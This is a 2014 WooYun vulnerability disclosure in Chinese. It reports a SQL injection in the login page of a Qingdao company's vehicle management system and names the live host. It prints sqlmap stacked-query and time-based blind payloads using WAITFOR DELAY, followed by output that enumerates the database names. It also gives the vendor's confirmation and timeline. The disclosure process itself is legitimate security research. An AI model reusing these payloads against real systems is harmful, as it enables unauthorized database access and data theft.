当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086722

漏洞标题:鲁诺某系统sql注射导致大量信息泄露

相关厂商:青岛鲁诺电子科技有限公司

漏洞作者: kydhzy

提交时间:2014-12-11 11:04

修复时间:2015-01-25 11:06

公开时间:2015-01-25 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-11: 细节已通知厂商并且等待厂商处理中
2014-12-16: 厂商已经确认,细节仅向厂商公开
2014-12-26: 细节向核心白帽子及相关领域专家公开
2015-01-05: 细节向普通白帽子公开
2015-01-15: 细节向实习白帽子公开
2015-01-25: 细节向公众公开

简要描述:

厂商很小气 ,每次都没给20rank ,你对得起你的客户我么。

详细说明:

http://www.runoqd.com/index.aspx
第三个车辆管理系统平台 http://58.58.34.98:8096/Login.aspx 登陆框sql注入

漏洞证明:

1.png


Place: POST
Parameter: tb_UserName
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMTUyNTI4NTI2Nw9kFgJmD2QWBAIBDxYCHgdWaXNpYmxlaGQ
CCQ8PZBYCHgdvbmNsaWNrBRVyZXR1cm4gQ2hlY2tJRk51bGwoKTtkGAEFHl9fQ29udHJvbHNSZXF1aXJ
lUG9zdEJhY2tLZXlfXxYBBQlidG5TdWJtaXR05kj9SiCKujazdtlJHIUkvKRJSLQXhzs10fLiMTjGwA=
=&__EVENTVALIDATION=/wEWBAKciOGAAQLxz5rXDwLF8dCIDALCi9reA6Sp/5YLyh562Bx40fHJ91Aa
wkND7BKz2PHl0XvaXx56&tb_UserName=gGRo'; WAITFOR DELAY '0:0:5';--&tb_Password=kGk
k&btnSubmit.x=1&btnSubmit.y=1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTUyNTI4NTI2Nw9kFgJmD2QWBAIBDxYCHgdWaXNpYmxlaGQ
CCQ8PZBYCHgdvbmNsaWNrBRVyZXR1cm4gQ2hlY2tJRk51bGwoKTtkGAEFHl9fQ29udHJvbHNSZXF1aXJ
lUG9zdEJhY2tLZXlfXxYBBQlidG5TdWJtaXR05kj9SiCKujazdtlJHIUkvKRJSLQXhzs10fLiMTjGwA=
=&__EVENTVALIDATION=/wEWBAKciOGAAQLxz5rXDwLF8dCIDALCi9reA6Sp/5YLyh562Bx40fHJ91Aa
wkND7BKz2PHl0XvaXx56&tb_UserName=gGRo' WAITFOR DELAY '0:0:5'--&tb_Password=kGkk&
btnSubmit.x=1&btnSubmit.y=1
---
do you want to exploit this SQL injection? [Y/n] y
[22:46:36] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[22:46:36] [INFO] fetching database names
[22:46:36] [INFO] fetching number of databases
[22:46:36] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[22:46:37] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
17
[22:46:54] [INFO] retrieved: baoeDB
[22:48:31] [INFO] retrieved: LuNuoSafety
[22:52:15] [INFO] retrieved: LuNuoSafety0822
[22:57:25] [INFO] retrieved: LuNuoSafetyTest
[23:02:45] [INFO] retrieved: LuNuoSystem
[23:07:19] [INFO] retrieved: L
[23:08:07] [ERROR] invalid character detected. retrying..
[23:08:07] [WARNING] increasing time delay to 6 seconds
[23:08:41] [ERROR] invalid character detected. retrying..
[23:08:41] [WARNING] increasing time delay to 7 seconds
uNuoSys
[23:12:37] [ERROR] invalid character detected. retrying..
[23:12:37] [WARNING] increasing time delay to 8 seconds
temTe
[23:15:48] [ERROR] invalid character detected. retrying..
[23:15:48] [WARNING] increasing time delay to 9 seconds
st 今天跑的太慢了 懒得跑了

修复方案:

厂商很小气 ,每次都没给20rank ,你对得起你的客户我么。

版权声明:转载请注明来源 kydhzy@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-12-16 08:36

厂商回复:

感谢您对鲁诺信息安全的关注

最新状态:

暂无